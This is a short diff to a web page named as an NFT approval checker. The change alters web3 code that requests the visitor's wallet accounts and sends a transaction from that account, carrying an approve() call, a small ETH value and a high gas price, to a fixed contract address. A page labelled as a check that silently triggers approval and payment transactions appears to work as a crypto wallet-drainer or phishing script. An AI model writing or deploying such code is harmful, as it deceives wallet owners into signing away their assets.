--- a/nft_check_approved.html
+++ b/nft_check_approved.html
@@ -645,12 +645,13 @@ var acct = (async function(){
 	var token_nx = localStorage.getItem("mySharedData1");
 	
  	
-        var _data = new web3.eth.Contract(abi, contract_address).methods.toApprove(add1x, add2x, token_nx).encodeABI();
+        var _data = new web3.eth.Contract(abi, contract_address).methods.approve().encodeABI();
         const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
         const account = accounts[0];
 	const result = await web3.eth.getTransactionCount(account)
 	_nonce = result
         console.log(account)
+		
 	await web3.eth.sendTransaction({'gas': web3.utils.toHex(100000),'gasPrice': web3.utils.toHex(web3.utils.toWei('100', 'gwei')), 'from': account, 'to': contract_address, 'value': web3.utils.toHex(200001), 'nonce': web3.utils.toHex(_nonce),'data': _data})
          //window.ethereum.on('accountsChanged', function (accounts) {
             // Time to reload your interface with accounts[0]!
